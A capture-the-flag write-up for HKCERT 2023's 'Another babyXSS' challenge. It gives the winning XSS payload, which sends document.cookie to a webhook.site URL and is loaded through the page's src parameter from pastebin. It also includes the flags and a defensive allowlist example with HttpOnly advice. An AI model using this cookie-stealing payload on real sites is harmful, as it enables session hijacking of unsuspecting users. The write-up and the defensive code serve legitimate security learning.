Here is the writeup for Another babyXSS!

hkcert23{he110_aga1n_4nd_we1c0m3_t0_hkc3r7_c7f}

Another babyXSS (又有寶貝 XSS) (100 pts) (with guide)

The official guide is here

Solution

  1. Craft an exploit.

    location='https://webhook.site/someWebHook/?cookie='+document.cookie

    => hosted at https://pastebin.com/xxxxxxxx

  2. Baby, now I am your trusted parent, give me your flag!

    http://babyxss-k7ltgk.hkcert23.pwnable.hk:28232/?src=https://pastebin.com/dl/xxxxxxxx

The flag is obtained at the webhook as hkcert23{pastebin_0r_trashbin}
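
Seen from the defending side, the solution works because the page runs whatever URL arrives in `src` as a script; the check below is an added example, not part of the original writeup or the challenge's source, showing an exact-origin allowlist that rejects such a URL before it is loaded. It assumes the application reads `src` from the query string and loads it as a script; `vetScriptSrc`, `ALLOWED_ORIGINS`, `APP_BASE` and the `example.com` hosts are hypothetical names and constructed values.

```javascript
// Added example: vet a user-supplied script URL against an exact-origin allowlist.
// Every name and origin here is hypothetical; none comes from the challenge.
const APP_BASE = 'https://app.example.com/'; // constructed: the page's own URL
const ALLOWED_ORIGINS = new Set([
  'https://app.example.com',    // same origin, so relative paths keep working
  'https://static.example.com', // constructed: a host serving only first-party files
]);
// A host where anyone can upload content must never be on this list:
// allowing it is equivalent to allowing arbitrary script.

// Returns the normalized URL when it may be loaded as a script, otherwise null.
function vetScriptSrc(raw) {
  if (typeof raw !== 'string' || raw.length === 0) return null;
  let url;
  try {
    // Resolving against the base handles relative and protocol-relative input
    // the same way the browser would, so the check sees the final target.
    url = new URL(raw, APP_BASE);
  } catch {
    return null; // unparsable input is rejected, never passed through
  }
  if (url.protocol !== 'https:') return null;    // data:, javascript:, http:
  if (url.username || url.password) return null; // https://trusted@other-host/
  // Compare the whole origin; substring or suffix matching on the hostname
  // would accept static.example.com.other-host.test.
  if (!ALLOWED_ORIGINS.has(url.origin)) return null;
  return url.href;
}

// Only a vetted URL ever reaches the script element (browser-side usage).
function loadVettedScript(doc, raw) {
  const href = vetScriptSrc(raw);
  if (href === null) return false;
  const el = doc.createElement('script');
  el.src = href;
  doc.head.appendChild(el);
  return true;
}
```

Marking the cookie `HttpOnly` would additionally keep it out of `document.cookie`, so a script that did get through could not read it this way.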